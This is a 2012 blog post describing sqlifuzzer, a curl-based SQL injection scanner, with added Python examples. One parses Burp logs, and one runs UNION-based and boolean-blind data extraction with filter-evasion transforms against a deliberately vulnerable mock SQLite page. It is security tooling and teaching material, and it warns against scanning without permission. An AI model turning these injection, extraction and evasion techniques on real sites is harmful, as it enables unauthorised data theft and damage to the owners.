Saturday, May 19, 2012

sqlifuzzer - Command Line SQL Injection Web Scanner



Sqlifuzzer is a command line scanner that seeks to identify SQL injection vulnerabilities. It parses Burp logs to create a list of fuzzable requests... then fuzzes them.

What is sqlifuzzer?
It's a wrapper for curl written in bash. It's also a tool that can be used to remotely identify SQL (and XPath) injection vulnerabilities. It does this by sending a range of injection payloads and examining the responses for signs of 'injectability'. If a parameter appears to be vulnerable, sqlifuzzer sends exploit payloads to extract data.
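The Burp-log-to-fuzz-request step described above is the part of the scanner most people never see, so here is an added example of it (this is not sqlifuzzer's own code, which is bash around curl, and the sample log is constructed in the style of a Burp 1.x proxy log rather than a real capture). It splits the log on its separator lines, reads the scheme from each entry's metadata line, parses the raw request, and collects injectable parameters from three places: the URL query string (on POSTs too), a urlencoded body, and the form fields of a multipart body (file-upload parts are skipped). `render` then produces the request a curl wrapper would send with one parameter's value extended by a payload.

```python
import re
import urllib.parse
from dataclasses import dataclass, field
SEPARATOR = re.compile(r"^={20,}[ \t]*$", re.M)      # lines between log entries
REQUEST_LINE = re.compile(r"^(?:GET|POST|PUT|DELETE|PATCH) \S+ HTTP/1\.[01]")

@dataclass
class Request:
    method: str
    url: str                                    # scheme://host/path, query string stripped
    headers: dict
    query: list = field(default_factory=list)   # [(name, value)] from the URL
    body: list = field(default_factory=list)    # [(name, value)] from the body
    body_kind: str = ""                         # "", "urlencoded" or "multipart"
    boundary: str = ""

def parse_multipart(body, content_type):
    """Form fields of a multipart body; file-upload parts are skipped, they are not SQLi candidates."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return [], ""
    params = []
    for part in body.split("--" + m.group(1))[1:]:
        head, _, value = part.partition("\n\n")
        name = re.search(r'name="([^"]+)"', head)
        if name and "filename=" not in head:
            params.append((name.group(1), value.rstrip("\n")))
    return params, m.group(1)

def parse_request(raw, scheme):
    """Split one raw HTTP request into method, URL, headers and parameters from query/body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in header_lines)}
    parsed = urllib.parse.urlsplit(target)
    req = Request(method, f"{scheme}://{headers['host']}{parsed.path}", headers)
    req.query = urllib.parse.parse_qsl(parsed.query, keep_blank_values=True)
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        req.body, req.body_kind = urllib.parse.parse_qsl(body.strip(), keep_blank_values=True), "urlencoded"
    elif ctype.startswith("multipart/form-data"):
        (req.body, req.boundary), req.body_kind = parse_multipart(body, ctype), "multipart"
    return req

def parse_log(text):
    """Walk the log: metadata lines give the scheme, request blocks become Request objects."""
    requests, scheme = [], "http"
    for chunk in (c.strip("\r\n") for c in SEPARATOR.split(text)):
        meta = re.match(r"\d{1,2}:\d{2}:\d{2}.*?\s(https?)://", chunk)
        if meta:
            scheme = meta.group(1)
        elif REQUEST_LINE.match(chunk):
            requests.append(parse_request(chunk, scheme))
    return requests

def fuzz_points(req):
    """Every injectable slot: URL query params (also on POSTs) and body params."""
    return [("query", i) for i in range(len(req.query))] + [("body", i) for i in range(len(req.body))]

def render(req, location, index, payload):
    """(method, url, headers, body) with `payload` appended to one parameter, others untouched."""
    query, body = list(req.query), list(req.body)
    target = query if location == "query" else body
    target[index] = (target[index][0], target[index][1] + payload)
    url = req.url + ("?" + urllib.parse.urlencode(query) if query else "")
    data = urllib.parse.urlencode(body) if req.body_kind == "urlencoded" else ""
    if req.body_kind == "multipart":
        data = "".join(f'--{req.boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
                       for n, v in body) + f"--{req.boundary}--\r\n"
    return req.method, url, req.headers, data

# Constructed sample in the style of a Burp proxy log (not a real capture).
SAMPLE_LOG = """\
======================================================
10:15:09 AM  http://shop.example:80  [192.0.2.10]
======================================================
POST /search.php?lang=en HTTP/1.1
Host: shop.example
Content-Type: application/x-www-form-urlencoded

q=widget&page=1
======================================================
10:15:20 AM  http://shop.example:80  [192.0.2.10]
======================================================
POST /upload.php HTTP/1.1
Host: shop.example
Content-Type: multipart/form-data; boundary=XYZ

--XYZ
Content-Disposition: form-data; name="title"

My file
--XYZ
Content-Disposition: form-data; name="upload"; filename="a.txt"

hello
--XYZ--
======================================================
"""
```

`parse_log(SAMPLE_LOG)` yields two requests; the first has three fuzz points (one in the query string of a POST, two in the body), the second has one (the `title` field; the file part is ignored). Handing `render(...)` output to curl is the remaining step: `-X` for the method, `-H` for each header, `--data` for the body. The metadata-line regex only pulls the scheme, so anything else Burp puts on that line is irrelevant to the parser.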

Like almost all web app scanners, sqlifuzzer includes OR 1=1 payloads; this means that there is a significant risk of data destruction, Denial of Service, and/or other undesirable implications for any host (or intermediary device) scanned using sqlifuzzer. sqlifuzzer is beta; don't use it in an environment that matters to you or anyone else. Do not use sqlifuzzer to scan hosts without the owner's permission.

Features
  • Payloads/tests for numeric, string, error-based and time-based SQL injection
  • Support for MSSQL, MySQL and Oracle DBMSs
  • Automated detection and testing of 'tricky' parameters: URL query parameters on POST requests and multipart form parameters
  • A range of filter evasion options:
      • case variation, nesting, double URL encoding, comments for spaces, 'LIKE' for the 'equals' operator, intermediary characters, null and CRLF prefixes, HTTP method swapping (GETs become POSTs / POSTs become GETs)
  • ORDER BY and UNION SELECT tests on vulnerable parameters to:
      • enumerate the number of columns in the SELECT query
      • identify string data-type columns in the SELECT query
      • extract database schema and configuration information
  • Conditional (boolean-based) tests to extract DBMS info when data extraction via UNION SELECT fails (e.g. no string-type columns)
  • Time-delay-based tests to extract DBMS info when the conditional methods also fail (i.e. fully blind scenarios)
  • Boolean response-based XPath injection testing and data extraction
  • Scan 'state' maintenance:
      • halt a scan at any time: scan progress is saved and you can resume from the URL where you stopped
      • specify a request number to resume a scan from
      • optionally exclude a customizable list of parameters from the scanning scope
      • tracking of parameters already scanned, so they are not scanned again
  • HTML format output with:
      • links/buttons to send Proof of Concept SQL injection requests
      • links to response difference files and to extracted data

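The ORDER BY / UNION SELECT enumeration, the conditional fallback and a few of the evasion transforms from the list above, as an added, self-contained example (not sqlifuzzer's own code). It runs against a constructed vulnerable page backed by an in-memory SQLite database, so the SQL is SQLite flavoured: `||` for concatenation where MySQL would use CONCAT(), and `unicode()`/`substr()` where MSSQL would use ASCII()/SUBSTRING(). The page echoes only the `name` column, which is exactly the situation the column-detection step exists for. Using the literal word "Error" as the oracle for ORDER BY is a simplification; a real scanner diffs the response against a baseline rather than matching one string. Time-delay extraction is not shown, since a mock backend has nothing to delay.

```python
import re
import sqlite3
import urllib.parse

# --- Constructed target: a page that concatenates the id parameter into SQL (deliberately vulnerable) ---
DB = sqlite3.connect(":memory:")
DB.executescript("CREATE TABLE products(id INTEGER, name TEXT, price REAL);"
                 "INSERT INTO products VALUES (1,'widget',9.99),(2,'gadget',19.99);")

def vulnerable_page(id_param):
    """Only the product name is echoed; id and price never reach the page, errors are shown verbatim."""
    try:
        rows = DB.execute("SELECT id, name, price FROM products WHERE id = " + id_param).fetchall()
    except sqlite3.Error as e:
        return f"<h1>Error</h1><p>{e}</p>"
    return "".join(f"<li>{name}</li>" for _id, name, _price in rows)

# --- Filter-evasion transforms of the kinds listed above (applied to the raw payload before sending) ---
def comments_for_spaces(p):
    return p.replace(" ", "/**/")

def case_variation(p):
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))

def double_url_encode(p):
    return urllib.parse.quote(urllib.parse.quote(p, safe=""), safe="")

def like_for_equals(p):
    return re.sub(r"\s*=\s*", " LIKE ", p)

# --- ORDER BY / UNION SELECT column enumeration and extraction ---
def count_columns(send, base="1", limit=32):
    """ORDER BY n errors once n exceeds the column count of the original SELECT."""
    for n in range(1, limit + 1):
        if "Error" in send(f"{base} ORDER BY {n}"):
            return n - 1
    return None

def reflected_columns(send, ncols, base="1", marker="sqlifuzzer"):
    """Put a marker string in each UNION position in turn; positions echoed in the page are usable."""
    usable = []
    for i in range(ncols):
        vals = ["NULL"] * ncols
        vals[i] = f"'{marker}'"
        if marker in send(f"{base} AND 1=0 UNION SELECT {','.join(vals)}"):
            usable.append(i)
    return usable

def union_extract(send, ncols, col, expr, base="1"):
    """Wrap `expr` in markers and read it back through a reflected column (SQLite uses || to concatenate)."""
    vals = ["NULL"] * ncols
    vals[col] = f"'SQLIF<'||({expr})||'>SQLIF'"
    m = re.search(r"SQLIF<(.*?)>SQLIF", send(f"{base} AND 1=0 UNION SELECT {','.join(vals)}"))
    return m.group(1) if m else None

def blind_extract(send, expr, base="1", maxlen=64):
    """Conditional fallback for when nothing is reflected: one bit per request via response comparison."""
    true_page = send(base)
    out = ""
    for i in range(1, maxlen + 1):
        lo, hi = 0, 127                         # binary search over the ASCII code of character i
        while lo < hi:
            mid = (lo + hi) // 2
            if send(f"{base} AND unicode(substr(({expr}),{i},1))>{mid}") == true_page:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                             # past the end of the string: unicode('') is NULL
            break
        out += chr(lo)
    return out

if __name__ == "__main__":
    send = lambda p: vulnerable_page(comments_for_spaces(p))   # same requests, spaces hidden from a naive filter
    n = count_columns(send)
    cols = reflected_columns(send, n)
    print(n, cols, union_extract(send, n, cols[0], "sqlite_version()"))
    print(union_extract(send, n, cols[0], "(SELECT group_concat(name) FROM sqlite_master)"))
    print(blind_extract(send, "sqlite_version()"))
```

The `send` callable is where a real scanner plugs in curl and an evasion transform; swapping `comments_for_spaces` for `case_variation` or `like_for_equals` changes what the filter sees without changing the enumeration logic. Note that `double_url_encode` only pays off against a server that decodes twice; the mock here does not decode at all, so it is only exercised as a string transform.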
What do I need to use sqlifuzzer?

sqlifuzzer is built and tested on BackTrack 5 R2 and should run on most BackTrack versions with no tweaks required. On all other platforms your mileage may vary: you will need an OS that can run bash (*nix, Cygwin (not tested), etc.), curl must be installed and in your path, and 'replace' (the string-replacement utility that ships with MySQL, which is missing from a default Ubuntu install) must also be in your path.

Until I implement web spider functionality, sqlifuzzer depends on Burp proxy (http://portswigger.net) to create log files (not Burp state files), which sqlifuzzer parses to build its internal list of fuzz requests. The free version of Burp can create these log files: within Burp go to options > misc and tick the 'proxy requests' box, browse the target site to populate the log, then pass the log file to sqlifuzzer.

Changelog v0.5l:
Improved time delay testing, payload tweaks, added evasion.txt payload list.
